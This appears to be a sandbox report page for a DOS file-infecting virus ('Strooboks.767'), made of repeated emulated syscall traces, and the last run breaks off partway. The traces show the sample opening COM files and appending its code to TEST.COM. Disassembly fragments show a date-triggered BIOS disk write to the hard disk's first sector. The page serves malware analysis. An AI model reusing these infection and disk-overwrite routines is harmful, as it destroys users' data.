Sample viewer

vx.netlux.org/Virus.DOS.Strooboks.767

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:25:38.533015516Z 48 PC: 14228 | Get DOS version
2018-12-17T22:25:38.535590067Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-17T22:25:38.538994009Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-17T22:25:38.54179466Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-17T22:25:38.544689771Z 78 PC: 14390 | Find first file
2018-12-17T22:25:38.552692004Z 67 PC: 1439d | Get or set file attributes
2018-12-17T22:25:38.560069153Z 67 PC: 143a9 | Get or set file attributes
2018-12-17T22:25:38.577835604Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:25:38.598699958Z 87 PC: 143d6 | Get or set file date and time
2018-12-17T22:25:38.600304388Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:25:38.607448098Z 67 PC: 143b5 | Get or set file attributes
2018-12-17T22:25:38.619188647Z 62 PC: 143b9 | Close file
2018-12-17T22:25:38.621606475Z 79 PC: 143bd | Find next file
2018-12-17T22:25:38.625148483Z 67 PC: 1439d | Get or set file attributes
2018-12-17T22:25:38.63449453Z 67 PC: 143a9 | Get or set file attributes
2018-12-17T22:25:38.646006772Z 61 PC: 143ca | Open file (Filename = 'PRINT.COM')
2018-12-17T22:25:38.654175998Z 87 PC: 143d6 | Get or set file date and time
2018-12-17T22:25:38.656492924Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:25:38.664310348Z 67 PC: 143b5 | Get or set file attributes
2018-12-17T22:25:38.675531859Z 62 PC: 143b9 | Close file
2018-12-17T22:25:38.677603665Z 79 PC: 143bd | Find next file
2018-12-17T22:25:38.681171156Z 67 PC: 1439d | Get or set file attributes
2018-12-17T22:25:38.687731985Z 67 PC: 143a9 | Get or set file attributes
2018-12-17T22:25:38.699362135Z 61 PC: 143ca | Open file (Filename = 'HELLO.COM')
2018-12-17T22:25:38.707619256Z 87 PC: 143d6 | Get or set file date and time
2018-12-17T22:25:38.709267983Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:25:38.716420882Z 67 PC: 143b5 | Get or set file attributes
2018-12-17T22:25:38.729214586Z 62 PC: 143b9 | Close file
2018-12-17T22:25:38.731516168Z 79 PC: 143bd | Find next file
2018-12-17T22:25:38.734743426Z 67 PC: 1439d | Get or set file attributes
2018-12-17T22:25:38.741973045Z 67 PC: 143a9 | Get or set file attributes
2018-12-17T22:25:38.752982141Z 61 PC: 143ca | Open file (Filename = 'PHANG.COM')
2018-12-17T22:25:38.76144552Z 87 PC: 143d6 | Get or set file date and time
2018-12-17T22:25:38.763691297Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:25:38.771145685Z 67 PC: 143b5 | Get or set file attributes
2018-12-17T22:25:38.782286752Z 62 PC: 143b9 | Close file
2018-12-17T22:25:38.784508681Z 79 PC: 143bd | Find next file
2018-12-17T22:25:38.788102682Z 67 PC: 1439d | Get or set file attributes
2018-12-17T22:25:38.794719956Z 67 PC: 143a9 | Get or set file attributes
2018-12-17T22:25:38.805942219Z 61 PC: 143ca | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:25:38.814285201Z 87 PC: 143d6 | Get or set file date and time
2018-12-17T22:25:38.815893541Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:25:38.823577846Z 67 PC: 143b5 | Get or set file attributes
2018-12-17T22:25:38.836422267Z 62 PC: 143b9 | Close file
2018-12-17T22:25:38.839424059Z 79 PC: 143bd | Find next file
2018-12-17T22:25:38.842791265Z 67 PC: 1439d | Get or set file attributes
2018-12-17T22:25:38.850073828Z 67 PC: 143a9 | Get or set file attributes
2018-12-17T22:25:38.862522825Z 61 PC: 143ca | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:25:38.870059894Z 87 PC: 143d6 | Get or set file date and time
2018-12-17T22:25:38.872293854Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:25:38.879453959Z 67 PC: 143b5 | Get or set file attributes
2018-12-17T22:25:38.891235314Z 62 PC: 143b9 | Close file
2018-12-17T22:25:38.897947549Z 79 PC: 143bd | Find next file
2018-12-17T22:25:38.901300631Z 67 PC: 1439d | Get or set file attributes
2018-12-17T22:25:38.908045782Z 67 PC: 143a9 | Get or set file attributes
2018-12-17T22:25:38.919839892Z 61 PC: 143ca | Open file (Filename = 'PAH.COM')
2018-12-17T22:25:38.927271439Z 87 PC: 143d6 | Get or set file date and time
2018-12-17T22:25:38.929165383Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:25:38.936696648Z 67 PC: 143b5 | Get or set file attributes
2018-12-17T22:25:38.952352165Z 62 PC: 143b9 | Close file
2018-12-17T22:25:38.954733455Z 79 PC: 143bd | Find next file
2018-12-17T22:25:38.958002613Z 67 PC: 1439d | Get or set file attributes
2018-12-17T22:25:38.965830171Z 67 PC: 143a9 | Get or set file attributes
2018-12-17T22:25:38.977139308Z 61 PC: 143ca | Open file (Filename = 'TEST.COM')
2018-12-17T22:25:38.98810318Z 87 PC: 143d6 | Get or set file date and time
2018-12-17T22:25:38.991268678Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:25:38.99480687Z 66 PC: 143fa | Move file pointer
2018-12-17T22:25:38.996742248Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:25:39.000413922Z 66 PC: 1440f | Move file pointer
2018-12-17T22:25:39.002151836Z 66 PC: 1442b | Move file pointer
2018-12-17T22:25:39.003698963Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:25:39.007546488Z 66 PC: 14453 | Move file pointer
2018-12-17T22:25:39.009167419Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-17T22:25:39.018785235Z 66 PC: 1446a | Move file pointer
2018-12-17T22:25:39.021174917Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:25:39.025241349Z 87 PC: 14480 | Get or set file date and time
2018-12-17T22:25:39.027055607Z 87 PC: 14488 | Get or set file date and time
2018-12-17T22:25:39.029001102Z 62 PC: 1448c | Close file
2018-12-17T22:25:39.038759976Z 67 PC: 14497 | Get or set file attributes
2018-12-17T22:25:39.049839511Z 67 PC: 143b5 | Get or set file attributes
2018-12-17T22:25:39.055204185Z 62 PC: 143b9 | Close file
2018-12-17T22:25:39.057530416Z 79 PC: 143bd | Find next file
2018-12-17T22:25:39.060292013Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-17T22:25:39.066559606Z 48 PC: 12a8f | Get DOS version
2018-12-17T22:25:39.068687303Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-17T22:25:39.076308462Z 93 PC: 12afe | File sharing functions
2018-12-17T22:25:39.078618548Z 9 PC: 12a86 | Display string (String= 'Size change=159Eh/05534d. ')
2018-12-17T22:25:39.084166079Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:01.748362813Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:01.750484482Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:01.752648399Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:01.754674871Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:01.765567999Z 78 PC: 14390 | Find first file
2018-12-25T11:52:01.771650693Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:01.777335168Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:01.804124689Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:01.812134257Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:01.813963056Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:01.825089634Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:01.835380409Z 62 PC: 143b9 | Close file
2018-12-25T11:52:01.837166103Z 79 PC: 143bd | Find next file
2018-12-25T11:52:01.839781105Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:01.846129318Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:01.856562165Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:01.863494503Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:01.865865336Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:01.885096209Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:01.895300589Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:01.906434825Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:01.909191561Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:01.91467097Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:01.924750556Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:01.931167159Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:01.932510683Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:01.939989236Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:01.952727924Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:01.95440153Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:01.957935796Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:01.963894442Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:01.974151115Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:01.981036536Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:01.982383088Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:01.988425651Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:01.99889821Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:02.001747265Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:02.004543659Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:02.015453889Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:02.034627162Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:02.041827647Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:02.043587268Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:02.050346717Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:02.060112856Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:02.061934396Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:02.065278786Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:02.071123966Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:02.08148523Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:02.089201093Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:02.090661885Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:02.096862464Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:02.107287905Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:02.109077768Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:02.111648574Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:02.117806743Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:02.127474148Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:02.13909935Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:02.141200746Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:02.14739659Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:02.157042361Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:02.159587579Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:02.162597543Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:02.168508594Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:02.178998399Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:02.18569286Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:02.187431738Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:02.195025708Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:02.196866068Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:02.199632399Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:02.202128819Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:02.203902936Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:02.211141668Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:02.213622523Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:02.222466443Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:02.224142848Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:02.227663876Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:02.229381869Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:02.231186599Z 62 PC: 1448c | Close file
2018-12-25T11:52:02.239741731Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:02.249802953Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:02.254727483Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:02.256693986Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:02.260329111Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:02.265937034Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:02.267428743Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:02.275759531Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:02.277912961Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:02.282144229Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:04.337305998Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:04.339194908Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:04.353309717Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:04.355793618Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:04.358731514Z 78 PC: 14390 | Find first file
2018-12-25T11:52:04.365756728Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:04.372010374Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:04.389978135Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:04.398515033Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:04.400227356Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:04.407270563Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:04.41937919Z 62 PC: 143b9 | Close file
2018-12-25T11:52:04.421604663Z 79 PC: 143bd | Find next file
2018-12-25T11:52:04.424803103Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:04.432169411Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:04.443720174Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:04.451650378Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:04.453873196Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:04.459055878Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:04.46729998Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:04.474183498Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:04.476167456Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:04.479938656Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:04.491172439Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:04.499229455Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:04.500700184Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:04.507803638Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:04.52018832Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:04.52213425Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:04.525038585Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:04.538155729Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:04.549310509Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:04.556933228Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:04.559568759Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:04.566938579Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:04.578229113Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:04.581093323Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:04.584062582Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:04.590457109Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:04.602931481Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:04.610749782Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:04.61281755Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:04.620411386Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:04.632727457Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:04.635273061Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:04.638684914Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:04.646243006Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:04.657963085Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:04.665266114Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:04.667851803Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:04.675442599Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:04.686381Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:04.68937378Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:04.692139882Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:04.698093501Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:04.708708799Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:04.722157047Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:04.723875457Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:04.730948215Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:04.743393077Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:04.745413829Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:04.748097555Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:04.754720941Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:04.765344471Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:04.772372331Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:04.775148986Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:04.782627018Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:04.784257635Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:04.788421435Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:04.789982581Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:04.791323881Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:04.800110816Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:04.801882057Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:04.811209368Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:04.813282406Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:04.81792895Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:04.819980178Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:04.822119383Z 62 PC: 1448c | Close file
2018-12-25T11:52:04.832170853Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:04.843283909Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:04.84886392Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:04.852064614Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:04.854892624Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:04.861764935Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:04.864138115Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:04.871873432Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:04.874367134Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:04.88006891Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:05.367364559Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:05.369238199Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:05.371416698Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:05.373594543Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:05.376690591Z 78 PC: 14390 | Find first file
2018-12-25T11:52:05.382534026Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:05.393090066Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:05.413960617Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:05.41871054Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:05.420656583Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:05.427503313Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:05.438293642Z 62 PC: 143b9 | Close file
2018-12-25T11:52:05.440540176Z 79 PC: 143bd | Find next file
2018-12-25T11:52:05.443575712Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:05.450053707Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:05.4606288Z 61 PC: 143ca | Open file (See above)
